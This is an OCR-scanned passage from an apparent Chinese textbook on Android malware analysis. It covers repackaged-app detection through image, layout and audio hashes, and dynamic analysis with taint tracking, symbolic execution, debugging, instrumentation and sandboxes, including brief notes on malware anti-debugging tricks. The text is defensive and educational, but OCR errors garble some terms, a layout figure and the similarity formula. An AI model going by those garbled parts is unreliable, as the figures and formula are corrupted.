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3. 基于 特征 文件 的 相似 性 检测 

前 面 介绍 的 两 种 方案 都 是 基于 dex 文件 中 代码 或 结构 的 相似 性 进行 比较 的 , 易 受到 
代码 混淆 的 影响 ,因此 ,研究 人 员 一 直 在 寻找 可 以 对 抗 代码 混淆 技术 的 重 打 包 应 用 检测 方 
法 。 由 于 重 打包 应 用 为 了 保持 与 原 应 用 的 相似 ,多 是 针对 原 应 用 的 dex 文件 和 使 用 的 第 
三 方 库 进行 修改 ,对 其 他 文件 的 改动 较 小 ,因此 研究 人 员 提 出 通过 特征 文件 内 容 的 相似 性 
来 评价 应 用 相似 性 的 方法 59 。 下 面 简单 介绍 相关 方案 的 设计 。 

1) 特征 文件 的 选取 

特征 文件 的 选取 应 符合 普遍 性 、 代 表 性 和 可 度量 性 的 原则 , 即 选 取 的 特征 文件 类 型 应 
在 Android 应 用 中 普遍 存在 ,其 具体 内 容 为 所 属 应 用 独 有 , 且 其 内 容 特征 可 以 度量 ,相似 
应 用 中 文件 的 内 容 距 离 近 , 不 相似 应 用 中 文件 的 内 容 距 离 远 。 根 据 这 些 原则 ,研究 人 员 在 
对 大 量 Android 应 用 的 文件 进行 分 析 后 ,选取 了 图 片 文件 ,布局 文件 和 音频 文件 3 类 文件 
作为 应 用 相似 度 比较 的 特征 文件 。 

2) 文件 内 容 特征 提取 

(1) 图 片 文件 。 

研究 人 员 发 现 , 重 打包 应 用 作者 通常 会 采用 两 种 方式 来 改变 原 应 用 中 的 图 片 (如 果 他 
们 修改 图 片 的 话 ): 一 是 在 原 有 图 片 的 基础 上 进行 轻 度 修改 ,如 将 彩色 图 片 修改 为 灰 度 图 
片 ; 二 是 改变 图 片 的 清晰 度 。 为 了 不 引起 用 户 对 重 打 包 应 用 的 怀疑 ,一 般 这 些 修 改 都 是 很 
微小 的 ,不 会 对 图 片 的 整体 结构 和 展示 产生 较 大 的 影响 。 所 以 可 以 选取 感知 喻 希 算法 提 
取 图 片 指纹 来 进行 相似 度 比较 。 

密码 学 中 的 哈 希 算法 ,例如 SHA1, 是 通过 一 些 数字 运算 由 任意 长 的 数据 产生 定 长 的 
随机 数据 ,输入 数据 发 生 很 小 的 变化 也 会 导致 输出 数据 发 生 很 大 的 变化 。 如 果 两 段 数据 
的 哈 希 值 不 同 ,可 以 判定 两 段 数据 一 定 是 不 同 的 ,而 当 两 段 数据 的 哈 希 值 相同 时 ,两 段 数 
据 相 同 的 概率 极 大 。 感 知 哈 希 算法 与 密码 学 中 的 哈 希 算法 不 同 , 当 对 图 片 数据 进行 感知 
哈 希 运算 时 ,如 果 图 片 数 据 发 生 了 微小 的 改动 ,感知 哈 希 值 的 变化 也 是 微小 的 ,因此 可 以 
对 图 片 的 感知 哈 希 值 进行 比较 来 判断 图 片 的 相似 性 。 

对 于 图 片 来 说 ,大 尺寸 的 图 片 包含 较 多 的 高 频 成 分 ,相应 地 包含 更 多 的 图 片 细节 ;小 
尺寸 的 图 片 则 主要 包含 图 片 的 低频 成 分 ,低频 成 分 更 多 反映 了 图 片 的 整体 结构 ,而 结构 相 
似 的 图 片 ,内 容 相似 的 可 能 性 也 会 比较 大 。 基 于 这 样 的 认 知 ,感知 哈 希 算法 采用 将 图 片 压 
缩 后 提取 哈 希 值 的 方法 提取 图 片 特 征 。 经 典 感知 哈 希 算法 的 步骤 如 下 : 

CD 改变 图 片 尺寸 。 为 了 消除 图 片 真 实 尺 寸 对 图 片 相 似 性 的 影响 ,算法 将 所 有 的 图 片 
缩小 到 8X8 的 大 小 , 即 64 个 像素 点 。 

O 将 图 片 转 为 灰 度 图 片 。 为 了 消除 色彩 对 图 片 内 容 相似 度 的 影响 ,算法 将 得 到 的 8 
X8 的 图 片 中 的 每 一 个 像素 值 都 统一 转换 为 灰 度 值 ,得 到 一 个 灰 度 图 片 。 

© 求 像 素 的 灰 度 值 平 均 数 。 计 算 64 个 像素 点 的 灰 度 值 平 均 数 。 

®© 二 值 化 。 将 64 个 像素 点 中 灰 度 值 大 于 灰 度 值 平 均 数 的 像素 点 置 1, 其 他 像素 点 置 
0, 得 到 一 个 二 值 化 的 图 片 。 

C 得 到 图 片 指纹 。 将 二 值 化 图 片 的 64 个 像素 点 按 一 定 顺 序 串联 成 一 个 64b 的 向 
量 ,就 是 图 片 的 指纹 。 
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在 具体 分 析 Android 应 用 中 图 片 文件 的 相似 性 时 ,基于 Android 应 用 中 40X40 分 辨 
率 的 图 片 所 占 比重 最 高 ,因此 将 感知 哈 希 算法 中 图 片 的 尺寸 由 8X8 改变 为 40X40 进行 
运算 ,最 后 得 到 十 六 进 制 数字 的 字符 串 表 示 ,字符 串 长 度 为 40X40/8 王 200。 

(2) 布局 文件 。 

Android 应 用 内 的 布局 文件 均 为 XML 格式 的 文件 .有 着 固定 的 结构 和 标签 名 ,因此 
在 提取 其 特征 时 ,可 以 将 这 些 固 有 的 因素 剔除 ,以 简化 特征 的 提取 。 具 体 来 说 ,可 以 将 布 
局 文件 中 的 结构 特征 和 符号 信息 过 滤 ,将 剩 下 的 信息 转化 为 字符 串 ,计算 其 散 列 值 作 为 文 
件 特 征 。 处 理 过 程 如 图 11-40 所 示 。 











«android.widget.QuickContactBadge landroid.widget.QuickContactBadge TextView 1728030600 
androidids"Q «id/avatar" android widget QuickContactBadge android:idz"Q«id/avatar" 2609093992 
android:layout, centerVertical- "true" android. widget.QuickContactBadge android:layout, centerVertical-"true" 1173947469 
android:srcz"Gdrawable/icon" android. widget QuickContactBadge android:srcz" Gdrawable/icon" [525599008 
stylez"?android:attr /quickContactBadgeStyleWindowSmall" /> landroid.widget QuickContactBadge stylez"7android'attr/ 911749496 

<TextView quickContactBadgeStyleWindowSmall” 901854376 
android:id="@+id/subject" TextView android:id="@+id/subject" 1976861618 
android:layout. widthz" wrap. content" TextView android-layout. widthz"wrap. content" 412558109 
android:layout, height-"wrap. content" TextView android-layout heightz"wrap. content" 638107242 
android:layout-toRightOf="@id/avatar” TextView android:layout_toRightOf="@id/avatar” 713242018 
androidellipsize-"end" /> TextView android:ellipsizez"end" 














图 11-40 布局 文件 处 理 过 程 


(3) 音频 文件 。 

研究 人 员 发 现 , 重 打包 应 用 作者 一 般 不 会 对 音频 文件 进行 大 的 修改 ,因此 采用 音频 文 
件 的 哈 希 值 作 为 文件 特征 ,具体 可 以 使 用 FNV1 算法 。FNV1 算法 是 一 种 高 离散 性 的 哈 
希 算 法 ,能 快速 处 理 大 量 数据 并 保持 较 小 的 冲突 率 , 适 用 于 处 理 非常 相近 的 内 容 。 

3) 相似 度 计 算 

应 用 的 相似 度 由 特征 文件 的 相似 度 来 表示 ,其 中 由 于 3 类 特征 文件 在 Android 应 用 
中 的 分 布 比重 不 一 致 ,因此 需要 对 3 类 文件 的 相似 度 赋予 相应 的 权重 以 更 好 地 度量 
Android 应 用 的 相似 性 。 经 过 实验 测试 ,研究 人 员 最 终 确定 为 3 类 文件 分 别 赋予 0. 6、0.3 
和 0. 1 的 权重 ,并 且 3 类 文件 中 相似 性 计算 值 高 的 权重 为 0. 6, 相 似 性 计算 值 低 的 权重 为 
0.1, 即 采用 动态 权 值 的 方法 。 

此 外 ,针对 每 一 类 文件 的 相似 度 的 计算 ,采用 内 容 相似 度 作为 标准 ,即将 每 一 类 文件 
的 特征 看 作 字 符 串 集合 ,将 两 个 应 用 中 相同 类 型 文件 得 到 的 字符 串 集合 的 交集 在 其 中 较 
小 的 集合 中 所 占 的 比例 作为 该 类 型 文件 的 相似 度 计算 值 ,因此 Android 应 用 的 相似 度 计 
算 公式 如 下 : 

sim(appi ,appz) 一 sim(app_filesi ,app_files: ) 


| image fea; N image fea; | 
min(| image fea; |. | image fea; |) 








Xa 


| sound fea, f] sound fea; | 
min(| sound fea, |. | sound fea; |) 





xp 
| layout. fea, N layout. fea; | 

min(| layout fea; |. | layout fea; |) 

其 中 sim(appi ,app; ) 为 图 片 相似 度 ,sim(app_files ,app_files; ) 为 文件 相似 度 ,image_fea 

为 图 片 文件 特征 集合 ,sound_fea 为 音频 文件 特征 集合 ,layout_feai 为 布局 文件 特征 集 
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11.4 动态 分 析 


相对 于 静态 分 析 ,动态 分 析 是 在 应 用 程序 运行 时 对 程序 的 运行 状态 进行 监控 与 分 析 
的 方法 。 动 态 分 析 具 有 不 需要 待 分 析 程 序 源码 ,能 准确 观察 到 程序 执行 过 程 中 状态 ,行为 
和 流程 的 变化 ,获得 执行 过 程 中 的 各 种 数据 等 优点 ,因而 在 恶意 代码 分 析 中 被 广泛 使 用 。 
Android 平台 动态 分 析 典 型 工具 包括 adb, DDMS 等 ,这 些 工具 通过 拦截 系统 API 或 调用 
系统 内 置 的 调试 功能 来 实现 分 析 。 另 外 也 有 一 类 基于 沙 盒 .虚拟 机 技术 等 开展 动态 分 析 
的 技术 ,代表 性 工具 包括 TaintDroid, DroidBox, Anubis 等 。 

TaintDroid?? f& Enck 等 人 提出 的 用 于 检测 隐私 信息 泄露 的 动态 污点 分 析 工 具 。 智 
能 手机 中 的 源 信息 指 的 是 其 各 种 敏感 信息 ,包括 地 理 位 置 \, 相 机 、 手 机 标识 符 等 。 
TaintDroid 通过 在 源 API 处 标记 信息 ,自动 传播 在 Dalvik 虚拟 机 指令 级 以 及 Android 系 
统 文件 级 的 标记 信息 。 当 到 达 下 沉 点 (sink) 时 ,系统 通过 检查 该 点 处 API 是 否 被 标记 , 然 
后 按照 相应 策略 做 出 响应 。 在 被 分 析 的 30 个 热门 应 用 程序 中 ,未 经 用 户 同 意 而 与 广告 商 
共享 地 址 信息 的 应 用 有 15 个 ,与 远程 服务 器 共享 用 户 设备 唯一 标识 符 的 有 7 个 。 然 而 ， 
TaintDroid 只 能 检测 敏感 隐私 信息 是 否 流出 手机 ,而 无 法 确定 信息 流出 是 否 是 在 用 户 知 
晓 的 情况 下 发 生 的 。Yanji Zhou 等 人 采取 了 权限 分 析 与 动态 分 析 相 结合 的 方法 ,首先 采 
用 基于 权限 特征 的 判断 方法 过 滤 掉 大 规模 数量 的 正常 软件 ,然后 依据 恶意 软件 可 能 采用 
的 技术 进行 动态 分 析 , 例 如 动态 加 载 Java 可 执行 代码 和 本 地 代码 的 行为 作为 特征 行为 进 
行 检测 。 其 原型 系统 DroidRanger 收集 官方 与 第 三 方 市 场 中 的 204 040 个 应 用 并 检测 出 
211 个 恶意 应 用 ,其 中 包含 0day 恶意 应 用 。AppInspector 通过 扩展 TaintDroid 来 跟踪 特 
定 类 型 的 数据 流 达到 自动 程序 分 析 的 目的 。 该 工具 旨 在 自动 检测 应 用 程序 的 隐私 泄露 问 
题 , 为 了 解决 污点 数据 通常 会 在 应 用 程序 界面 上 停滞 不 前 的 问题 ,Gilbert 等 人 还 采用 了 
具体 执行 和 符号 执行 相 结合 的 方法 。 

AppsPlayground 采用 了 基于 TaintDroid 的 静态 污点 追踪 、API 调用 监控 和 内 核 层 
的 监控 来 监控 和 分 析 程 序 运行 状态 ,通过 实现 事件 触发 和 智能 执行 技术 提高 动态 分 析 的 
路 径 著 盖 率 。 此 外 AppsPlayground 还 对 所 使 用 的 模拟 器 进行 了 修改 ,通过 设置 真实 设 
备 相 关 的 标识 符 和 数据 ,使 其 绕 过 恶意 应 用 对 模拟 环境 的 检测 。 

VetDroid 则 是 从 权限 使 用 的 角度 重建 应 用 程序 行为 ,分 析 应 用 程序 对 权限 的 使 用 和 
对 敏感 资源 的 使 用 。VetDroid 提出 了 两 类 权限 使 用 点 。 一 类 是 显 式 权限 使 用 点 , 即 应 用 
程序 中 显 式 请 求 受权 限 保护 的 敏感 资源 的 地 方 , 与 Android API 调用 相关 ; 另 一 类 为 隐 式 
权限 使 用 点 ,是 被 请 求 的 资源 实际 被 使 用 的 地 方 。VetDroid 通过 拦截 相应 Android API 
的 调用 ,并 从 Android 权限 执行 系统 中 获取 准确 的 权限 检测 信息 来 识别 显 式 权限 使 用 点 ， 
其 构建 的 Android API 调用 和 权限 之 间 的 映射 关系 比 PScout 更 为 精确 。VetDroid 利用 
TaintDroid 实现 了 一 个 基于 权限 的 污点 分 析 方 案 , 获 取 隐 式 权限 使 用 点 的 信息 。 通 过 收 
集 显 式 权限 使 用 点 和 隐 式 权限 使 用 点 , 按 执行 顺序 将 其 排列 , 即 可 得 到 相应 权限 的 使 用 
图 。 通 过 这 些 信息 ,VetDroid 识别 出 了 比 TaintDroid 更 多 的 隐私 泄露 场景 。 
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在 一 些 系 统 或 方法 中 ,动态 分 析 技 术 常常 与 静态 分 析 技术 结合 使 用 ,弥补 各 自 的 不 足 
之 处 。 如 DroidRanger 采用 基于 启发 的 过 滤 和 动态 运行 监控 的 方案 来 检测 未 知 恶意 应 
用 ,通过 寻找 DexClassLoader 函数 的 调用 和 native 代码 的 存放 路 径 异常 ,过 滤 掉 不 存在 
动态 加 载 恶意 代码 行为 的 应 用 程序 ,对 剩 下 的 应 用 进行 动态 分 析 , 获 取 其 行为 信息 , 进 一 
步 分 析 判 断 是 否 真实 存在 恶意 行为 。DroidRanger 在 204 040 款 应 用 中 共 发 现 了 40 款 新 
型 恶意 应 用 ,其 中 包含 著名 的 恶意 应 用 家 族 DroidKungFu。 但 DroidRanger 提出 的 方案 
只 能 检测 使 用 了 动态 加 载 功能 的 恶意 应 用 ,其 他 类 型 的 恶意 应 用 并 不 在 其 考虑 范围 内 。 
而 据 学 者 推测 分 析 ,Google 在 其 官方 应 用 市 场 Google Play 上 使 用 的 恶意 应 用 检测 系统 
Bouncer 也 采用 了 动态 和 苦 态 分 析 技 术 相 结合 的 检测 分 析 方 案 。 

本 节 从 数据 流 分 析 和 动态 行为 分 析 两 方面 介绍 动态 分 析 技 术 。 


114.1 数据 流 分 析 


维基 百科 中 数据 流 分 析 的 定义 是 :“ 一 种 用 于 收集 计算 机 程序 在 不 同 点 计算 的 值 的 
信息 的 技术 。 一 个 程序 的 控制 流 图 (Control Flow Graph,CFG) 被 用 来 确定 对 变量 的 一 
次 赋值 可 能 传播 到 程序 中 的 哪些 部 分 ," 数 据 流 分 析 常 被 用 于 代码 优化 恶意 代码 检测 等 
方面 ,其 具体 实现 主要 包括 符号 执行 、 污 点 传播 等 方法 。 

符号 执行 (symbolic execution) 是 一 种 程序 分 析 技 术 。 利 用 该 技术 ,可 以 通过 分 析 程 
序 结构 计算 出 让 特定 代码 执行 的 程序 输入 。 使 用 符号 执行 分 析 一 个 程序 时 ,该 程序 会 使 
用 符号 值 而 不 是 具体 的 数值 作为 输入 。 在 达到 目标 代码 时 ,分 析 器 可 以 提取 出 相应 的 路 
径 约束 ,然后 通过 通用 的 约束 求解 器 就 可 以 得 到 触发 目标 代码 块 的 具体 数值 输入 。 

SymDroid 提供 了 面向 Dalvik 字 节 码 的 符号 执行 引擎 。SymDroid 直接 在 Dalvik 字 
节 码 上 执行 操作 ,首先 其 将 Dalvik 字 节 码 转 换 为 i-Dalvik 指令 ,后 者 将 标准 的 200 余 条 
Dalvik 指令 转换 为 精简 后 的 16 条 指令 ,从 而 简化 分 析 。 为 了 保证 分 析 效 果 ,SymDroid 也 
对 Android 平台 上 常见 的 生命 周期 回调 和 异步 接口 进行 了 额外 的 处 理 。 研 究 人 员 从 两 个 
方面 评估 了 SymDroid 的 有 效 性 : 首先 ,在 Android 兼容 性 测试 框架 (Android 
Compatibility Test Suite) 上 运行 SymDroid ,发 现 绝 大 多 数 测试 运行 通过 , 且 运 行 效率 是 
Dalvik VM 的 一 半 ,是 Java VM 的 两 倍 ; 其 次 ,使 用 SymDroid 提取 Android 应 用 程序 的 
路 径 约 东 ,结果 表明 SymDroid 较为 有 效 。 

在 Android 系统 上 使 用 符号 执行 技术 进行 恶意 代码 分 析 的 成 果 也 日 益 增多 。 其 中 
AppIntent 使 用 了 改进 的 符号 执行 技术 : 事件 空间 限制 的 符号 执行 (event-space 
constraint symbolic execution), 有 效 地 解决 了 传统 符号 执行 搜索 空间 巨大 的 问题 。 
AppIntent 面向 隐私 泄露 问题 ,通过 改进 的 符号 执行 技术 生成 可 以 触发 敏感 数据 传播 的 
UI 交互 序列 和 数据 输入 ,然后 利用 动态 分 析 平 台 将 此 次 数据 传输 的 过 程 重 现 , 供 人 工分 
析 判 断 其 中 是 否 有 用 户 参 与 过 程 。 

动态 污点 传播 分 析 也 是 数据 流 分 析 的 重要 组 成 部 分 。 动 态 污点 传播 分 析 是 追踪 数据 
处 理 流 程 ,确定 指令 之 间 数 据 依赖 关系 的 一 种 有 效 方法 。 动 态 污 点 传播 系统 实现 主要 有 
3 种 方法 : 基于 源 代码 的 实现 、 基 于 代码 转换 的 实现 和 基于 硬件 扩展 的 实现 。 基 于 源 代 
码 的 实现 方法 ,在 编译 阶段 时 在 程序 中 嵌入 动态 污点 传播 功能 代码 以 实现 污点 传播 分 析 ， 
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或 直接 针对 源码 展开 污点 传播 运算 ,代表 性 工作 是 Lam 等 人 提出 的 通用 的 动态 信息 流 分 
析 架 构 GIFT 和 Xu 等 人 提出 的 C 语 言 源码 污点 传播 工具 。GIFT 通过 在 程序 中 插入 中 
断 点 (interception point) ,调用 代理 函数 (proxy function) 完 成 污点 传播 分 析 。Xu FAW 
于 CIL 提出 一 种 C 程序 解析 转换 工具 ,通过 对 源 程序 进行 转换 ,追踪 内 存 每 个 字 节 使 用 
情况 。 这 些 方 法 虽然 在 效率 上 具有 一 定 的 优势 ,但 是 由 于 其 需要 源 代码 的 局 限 性 ,很 难 用 
于 恶意 代码 分 析 。 

当前 的 动态 污点 传播 分 析 通 常 基于 二 进 制 代码 解析 工具 或 者 虚拟 机 实现 ， 
TaintCheck、Panorama、BitBlaze 等 都 是 基于 该 思路 的 不 同 实现 。 加 州 大 学 伯克利 分 校 开 
发 的 Panorama、BitBlaze 以 及 与 卡 内 基 。 梅 隆 大 学 联合 研制 的 DTA ++ 均 采 用 中 间 指 令 
的 方式 进行 污点 传播 分 析 , 通 过 将 程序 执行 的 指令 分 块 翻译 成 中 间 语 言 指令 集 ,针对 简化 
的 中 间 语 言 指令 集 进行 动态 污点 传播 分 析 。 该 方法 是 一 种 底层 实现 方法 ,无 须 提供 程序 
源 代码 和 库 源 代码 ,能 够 提供 足够 的 执行 细节 ,但 是 该 方法 基于 二 进 制 汇编 代码 实现 ,不 
适用 于 Android 的 混合 执行 机 制 。Chandra 等 人 提出 了 基于 Java 虚拟 机 的 污点 传播 机 
制 ,由 于 该 分 析 过 程 针 对 纯 Java 代码 实现 ,因此 无 法 分 析 Android 的 原生 代码 。Android 
平台 的 污点 传播 代表 性 研究 为 William Enck 等 人 研发 的 TaintDroid 系统 ,TaintDroid 修 
改 了 Android 系统 以 提供 污点 的 标记 并 追踪 其 传播 。TaintDroid 在 相关 API 调用 处 将 
隐私 数据 标记 为 污点 数据 ,在 隐私 数据 通过 程序 变量 .文件 .进程 间 通 信 传 播 时 提供 标记 ， 
若 发 现 污点 数据 通过 网 络 传输 出 去 或 以 其 他 方式 离开 系统 , 则 判定 发 生 了 隐私 泄露 。 对 
于 Android 系统 Dalvik 虚拟 化 代码 和 原生 代码 混合 执行 的 问题 ,该 系统 采用 分 析 JNI 
(Java Native Interface, Java 本 地 接口 ) 接 口 的 方式 代替 原生 代码 的 污点 传播 分 析 。 实 际 
上 目前 很 多 恶意 代码 的 行为 都 是 基于 原生 代码 实现 的 ,TaintDroid 在 恶意 代码 动态 分 析 
方面 仍 具 有 一 定 的 局 限 性 。 

其 他 相关 研究 还 包括 Suh 等 人 提出 的 通过 硬件 扩展 追踪 信息 流 的 方法 。 尽 管 该 方 
法 可 以 对 抗 多 种 恶意 代码 攻击 的 形式 ,但 它 需 要 有 复杂 的 硬件 扩展 支持 ,成 本 高 ,技术 难 
度 大 ,扩充 能 力 差 ,难以 满足 实际 工作 的 需求 。 

根据 以 上 分 析 可 知 ,当前 的 污点 传播 方法 在 行为 分 析 、 数 据 流程 追踪 方面 取得 了 较 大 
的 进展 ,但 是 要 达到 对 Android 系统 可 执行 程序 数据 处 理 流程 进行 有 效 追 踪 和 分 析 , 还 需 
要 进一步 的 研究 。 


1142 数据 流 分 析 典 型 工具 


1. Panda for Android 

Panda 是 一 个 与 平台 的 架构 无 关 的 开源 动态 分 析 平 台 。Panda 是 利用 系统 模拟 器 
QEMU 构建 的 ,所 以 Panda 可 以 得 到 客户 系统 所 有 的 执行 指令 和 数据 。Panda 在 
QEMU 基础 上 增加 了 一 些 其 他 功能 ,比如 记录 指令 .重复 执行 指令 、 增 加 迁 代 、 全 系统 深 
度 分 析 等 。 这 些 日 志文 件 信息 可 以 共享 ,试验 结果 也 可 以 重 放 。 日 志文 件 格式 紧凑 ,例如 
FreeBSD 启动 需要 90 亿 条 指令 ,而 这 些 信息 可 以 保存 在 一 个 只 有 几 百 兆 字 节 的 文件 中 。 
QEMU 支持 13 种 不 同 的 CPU 架构 ,所 以 基于 QEMU 的 Panda 可 以 利用 LLVM IR 分 
析 多 种 指令 集 。Panda 的 功能 是 通过 插件 实现 的 , 它 可 以 在 插件 之 间 共 享有 用 的 信息 , 因 
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此 方便 了 分 析 代码 的 重用 ,简化 了 复杂 分 析 。Panda 目前 由 麻 省 理工 学 院 林肯 实验 室 、 纽 
约 大 学 和 东北 大 学 共同 开发 。 

Panda 可 以 支持 运行 在 Goldfish 虚拟 平台 上 的 ARMv7 架构 的 Android 系统 。 其 中 
DroidScope 项 目 中 的 部 分 功能 直接 集成 到 了 Panda 系统 中 。 

1) Linux 层 的 监控 

目前 Linux 层 的 DroidScope 代码 可 以 工作 在 为 Android Goldfish 内 核定 制 的 Linux 
上 。 当 目前 的 页 表 发 生变 化 时 ,DroidScope 也 会 更 新 它 的 影子 进程 列表 。 必 要 时 ,进程 
列表 可 以 追踪 线程 和 加 载 的 模块 ,也 可 以 使 用 DroidScope 中 的 工具 提取 符号 。Panda 
的 系统 调用 追踪 捅 件 被 加 载 之 后 ,DroidScope 可 以 在 执行 fork, clone, exec 调用 时 发 出 
通知 ,还 可 以 分 析 exec 调用 之 后 的 进程 模块 列表 。 为 了 更 加 方便 地 使 用 这 些 数 据 ,用 
户 可 以 修改 context. 文件 ,或 者 复 用 系统 调用 追踪 模块 的 代码 。 用 户 也 可 以 在 GDB 
中 运行 Panda, 通过 执行 call printProcessList(0) 可 以 在 Panda 的 输出 流 中 打印 进程 
列表 。 

2) Dalvik 层 的 监控 

Dalvik 层 的 DroidScope 代码 只 能 运行 在 Android 2.3 上。 在 之 后 的 版 本 的 Android 
中 Dalvik 改动 较 大 ,目前 还 不 能 兼容 。 

2. TaintDroid 

智能 手机 可 以 方便 地 安装 第 三 方 的 应 用 ,很 多 应 用 会 获取 用 户 的 个 人 数据 ,例如 地 理 
位 置 .手机 IMEI 等 ,并 使 用 这 些 数据 来 提高 用 户 的 体验 。 然 而 ,很 少 有 应 用 会 提供 隐私 
政策 来 清晰 地 说 明 它 是 如 何 使 用 这 些 隐私 数据 的 ,所 以 用 户 想 要 使 用 这 些 应 用 的 时 候 只 
能 被 迫 相信 应 用 会 以 合理 的 方式 使 用 他 们 的 隐私 数据 。 在 这 个 背景 下 ,Intel 公司 、 宾 夕 
法 尼 亚 州 立 大 学 和 杆 克 大 学 的 一 项 联合 研究 表明 从 应 用 市 场 下 载 的 部 分 常用 应 用 会 窃取 
用 户 隐私 ,并 把 隐私 数据 汇 露 给 在 线 广 告 商 。 上 述 研究 人 员 开 发 了 一 款 可 以 实时 监控 
Android 系统 的 一 项 服务 ,叫做 TaintDroid。 它 可 以 分 析出 用 户 隐私 数据 是 如 何 被 App 
获取 和 泄露 的 。 在 对 30 款 常 见 的 应 用 的 分 析 过 程 中 ,研究 人 员 发 现 其 中 有 15 款 会 把 用 
户 的 地 理 位 置信 息 发 送 到 广告 商 的 服务 器 上 ,其 中 有 7 款 应 用 发 送 了 手机 硬件 的 唯一 标 
识 码 ,有 些 应 用 甚至 发 送 了 手机 号 码 和 SIM 卡 的 序列 号 给 开发 者 。 

TaintDroid 使 用 动态 污点 传播 技术 跟踪 用 户 隐 私 数据 在 应 用 程序 和 系统 中 的 传播 ， 
检测 隐私 数据 泄露 行为 。TaintDroid 修改 了 Android 系统 以 提供 污点 的 标记 并 追踪 其 传 
播 。TaintDroid 在 相关 API 调用 处 将 隐私 数据 标记 为 污点 数据 ,在 隐私 数据 通过 程序 变 
量 、 文 件 、 进 程 间 通信 传播 时 提供 标记 , 若 发 现 污 点 数据 通过 网 络 传输 出 去 或 以 其 他 方式 
离开 系统 , 则 判定 发 生 了 隐私 泄露 。 由 于 TaintDroid 只 追踪 数据 流 信 息 ,因此 不 能 检测 
通过 控制 流 攻击 导致 的 信息 泄露 。 由 于 TaintDroid 平台 通过 更 改 Dalvik 虚拟 机 实现 了 
对 应 用 程序 内 部 应 用 程序 之 间 的 敏感 数据 流动 的 监控 ,因此 为 了 使 用 TaintDroid ,必须 
自己 编译 Android 代码 生成 ROM, 并 把 ROM 刷 入 手机 硬件 或 虚拟 机 。 成 功 安 装 
TaintDroid 之 后 ,读者 可 以 写 一 个 读 取 手机 IMEI 或 联系 人 信息 ,并 通过 网 络 或 短信 等 方 
式 发 出 手机 的 测试 应 用 ,以 实际 观察 TaintDroid 系统 的 分 析 效 果 。 
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143 动态 行为 分 析 


动态 行为 分 析 是 指 实际 运行 分 析 目 标 ,并 在 样本 运行 过 程 中 采用 调试 .Hook、 硬 件 信 
息 提取 还 原 等 措施 监控 其 系统 调用 、 文 件 操作 、 网 络 访问 等 行为 ,最 后 根据 监测 到 的 动态 
行为 信息 进行 进一步 的 分 析 。 

根据 采用 的 技术 手段 的 不 同 , 针 对 Android 应 用 软件 的 动态 行为 分 析 可 分 为 动态 调 
试 ,程序 插 桩 、 沙 盒 等 类 别 。 动 态 调试 技术 在 操作 系统 层面 有 较为 完善 的 支持 ,但 常常 面 
临 着 反 调试 技术 的 挑战 ;程序 插 桩 技术 无 须 在 操作 系统 中 添加 额外 的 模块 或 启动 调试 器 ， 
但 其 主要 问题 是 必须 静态 地 修改 分 析 目 标 , 并 修改 应 用 程序 的 签名 ,因此 难以 应 对 分 析 目 
标的 动态 代码 ,也 难以 应 对 程序 启动 后 的 签名 校 验 、 完 整 性 检查 等 防 修改 探测 技术 ; 沙 盒 
技术 则 较 好 地 解决 了 动态 调试 技术 和 程序 插 桩 技术 易 被 反 制 的 问题 ,是 目前 动态 行为 分 
析 的 主流 技术 手段 。 下 面 分 别 介绍 这 3 种 常用 技术 手段 。 

1. 动态 调试 技术 

软件 调试 技术 可 分 为 基于 源 代码 的 调试 和 基于 可 执行 文件 的 调试 。 在 软件 安全 分 析 
中 ,一 般 无 法 获取 软件 源码 ,因此 通常 采用 基于 可 执行 文件 的 调试 。 

Dalvik 虚拟 机 通过 实现 JDWP(Java Debug Wire Protocol) 协 议 ,具备 了 对 调试 功能 
的 支持 。Android 官方 提供 的 调试 工具 套件 是 DDMS(Dalvik Debug Monitor Server) ,在 
Android SDK 中 可 以 找到 该 工具 。DDMS 工具 可 以 观察 目标 进程 的 Javaheap 情况 ,也 可 
以 利用 Method Profiling 工具 追踪 .记录 目标 进程 每 个 Java API 的 调用 序列 。 针 对 原生 
程序 Cnative code) 的 调试 则 较为 复杂 一 些 , 由 于 Android 系统 底层 为 Linux, 因 此 可 以 使 
用 gdb 配合 gdbserver 进行 Android 原生 程序 的 指令 级 别 的 调试 。 

恶意 代码 为 了 对 抗 动态 调试 ,常常 会 采用 反 调试 技术 。 常 见 的 反 调试 技术 有 调试 标 
志 检 测 ,利用 一 些 特征 检测 当前 自身 是 否 处 于 被 调试 状态 ,如 利用 在 同一 时 间 进 程 最 多 只 
能 被 一 个 调试 器 调试 的 特点 ,通过 调试 进程 自身 来 判断 是 否 已 经 有 其 他 调试 器 存在 ;探测 
单 步 执行 ,通过 检测 堆栈 状态 或 指令 运行 时 间 来 判断 是 否 处 于 单 步 执 行 状态 ,例如 由 于 程 
序 在 单 步调 试 时 运行 时 间 往 往 显著 大 于 正常 运行 时 间 , 因 此 可 设置 超时 后 终止 程序 。 

2. 程序 插 桩 技术 

程序 持 桩 技术 指 在 不 影响 分 析 目 标 原 有 逻辑 的 基础 上 ,插入 一 些 额外 的 代码 ,从 而 检 
测 或 提取 敏感 API 的 执行 .控制 流 和 数据 流 信息 等 。 与 动态 调试 技术 类 似 ,程序 插 装 也 
分 为 针对 源 代 码 的 插 桩 和 针对 可 执行 程序 的 插 桩 。 在 安全 性 分 析 中 ,通常 针对 可 执行 程 
序 进行 插 桩 处 理 。 

面向 Android 应 用 插 桩 已 有 一 些 研究 成 果 。 如 Capper 通过 重 写 应 用 程序 字 节 码 ,在 
其 中 加 入 监控 指令 来 记录 隐私 信息 的 流动 ,并 提供 了 上 下 文 感知 的 策略 执行 机 制 来 方便 
用 户 判 断 是 否 放行 当前 的 应 用 行为 。 与 此 类 似 ,AppSealer 通过 修改 应 用 程序 ,给 程序 打 
补丁 来 获取 应 用 程序 运行 时 的 状态 ,判断 应 用 程序 中 是 否 存在 组 件 劫持 漏洞 。 

在 插 桩 工具 方面 ,DroidBox 的 一 个 扩展 项 目 APIMonitor 可 以 向 目标 APK 程序 的 
关键 系统 API 前 后 自动 插入 监控 代码 ,并 以 Log 的 形式 输出 到 Logcat。 而 SOOT 工具 
提供 了 更 加 全 面 的 Android 应 用 程序 插 桩 支持 。 
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为 了 解决 动态 调试 技术 和 代码 插 桩 技术 易 被 反 制 的 问题 ,研究 人 员 采 用 沙 盒 、 虚 拟 机 
技术 等 开展 动态 分 析 , 代表 性 研究 包括 CWSandbox、Norman Sandbox、TaintDroid、 
TTAnalyze、BitBlaze 等 。 其 中 CWSandbox、Norman Sandbox 采用 拦截 系统 API 的 方式 
